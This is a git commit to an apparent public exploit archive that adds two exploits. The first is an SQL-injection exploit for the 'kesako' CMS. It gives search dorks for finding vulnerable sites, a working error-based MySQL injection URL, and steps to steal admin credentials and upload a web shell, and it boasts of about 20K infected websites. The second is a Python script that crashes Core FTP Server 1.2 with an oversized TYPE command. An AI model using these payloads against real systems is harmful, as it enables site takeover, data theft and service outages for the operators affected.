Updated 05_26_2014

2014-05-26 04:36:20 +00:00 · 2014-05-26 04:36:20 +00:00 · 359a8017ee
commit 359a8017ee
parent 4d0e8ffd90
3 changed files with 96 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30174,3 +30174,5 @@ id,file,description,date,author,platform,type,port
 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0
 33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33492,platforms/php/webapps/33492.txt,"kesako script SQL Injection",2014-05-24,Microsoft-dz,php,webapps,0
+33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0
--- a/platforms/php/webapps/33492.txt
+++ b/platforms/php/webapps/33492.txt
@ -0,0 +1,35 @@
+kesako script SQL Injection
+===================================================================
+####################################################################
+#.:. Exploit Title : kesako Script Sql Injection                  #
+# .:. Author       : Microsoft-dz                                 #
+#.:. Contact       : [ifyoucanbebeme@gmail.com]                   #
+#.:. Dork    : intext:powered by [kesako] inurl:/event.php?id=    #
+#.:. Dork 2         : intext:powered by [kesako]                  #                  
+#.:. Tested on      : win&linux                                   #
+#.:. Vendor's Website : http://www.kesako.ch/cms/                 #
+#.:. Date           : [2014/5/19]                                 #
+####################################################################
+VULNERABILITY
+##############
+[~] VULNERABILITY}~~
+[~] www.site.com/modules/event.php?id=[SQL INJECTION]
+[~] www.site.com/modules/event.php?id=[SQL INJECTION]
+#########
+P0C
+#########
+Type: String Mysql Injection
+http://SITE/modules/event.php?id=[SQL INJECTION]
+
+http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
+####################################################################
+1- Get Admin Infos 
+2- then login and upload your shell 
+Enjoy
+About #20K Infected Websites :v
+
+You Can Find The Admin Panel @ http://site/cms/admin
+or http://site/cms/user/
+or http://site/cms/login/
+#########################################################################
+Tnx: R3Z0Uk4
--- a/platforms/windows/dos/33495.py
+++ b/platforms/windows/dos/33495.py
@ -0,0 +1,59 @@
+#!/usr/bin/python
+
+import socket,sys,time
+
+def Usage():
+        print ("Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.")
+        print ("Usage: ./coreftp_dos.py <host> <port> <username> <password>")
+        print ("Ex:    ./coreftp_dos.py 192.168.10.10 21 ftp ftp\n")
+
+if len(sys.argv) <> 5:
+        Usage()
+        sys.exit(1)
+else:
+        host=sys.argv[1]
+        port=sys.argv[2]
+        user=sys.argv[3]
+        passwd=sys.argv[4]
+        evil = '\x41' * 210
+        print "[+] Trying to crash Core FTP server with " + str(len(evil)) + " buffer bytes"
+        print "[+] Host: " + host + " Port: " + port + " User: " + user + " Pass: " + passwd
+        print "[+] Attempting to connect to the remote Core FTP Server..."
+        first = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        port=int(port)
+        try:
+                connect = first.connect((host, port))
+        except:
+                print "[-] There was an error while trying to connect to the remote FTP Server"
+                sys.exit(1)
+        print "[+] Connection to remote server successfully... now trying to authenticate"
+        first.recv(1024)
+        first.send('USER ' + user + '\r\n')
+        first.recv(1024)
+        first.send('PASS ' + passwd + '\r\n')
+        first.recv(1024)
+        first.send('dir\r\n');
+        first.send('TYPE ' + evil + '\r\n')
+        try:
+                first.recv(1024)
+        except:
+                print "[-] Couldn\'t authenticate in the remote FTP server"
+                sys.exit(1)
+        print "[+] First buffer was sent, waiting 30 seconds to send a second time with some more bad data..."
+        first.close()
+        second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        time.sleep(30)
+        try:
+                connect = second.connect((host, port))
+        except:
+                print "[-] FTP Server isn\'t responding... it might had successfully crashed."
+                sys.exit(1)
+        second.send('USER ' + user + '\r\n')
+        second.recv(1024)
+        second.send('PASS ' + passwd + '\r\n')
+        second.recv(1024)
+        second.send('TYPE ' + evil + '\r\n')
+        second.recv(1024)
+        print "[+] By now, Core FTP Server should had crashed and will not accept new connections."
+        second.close()
+        sys.exit(0)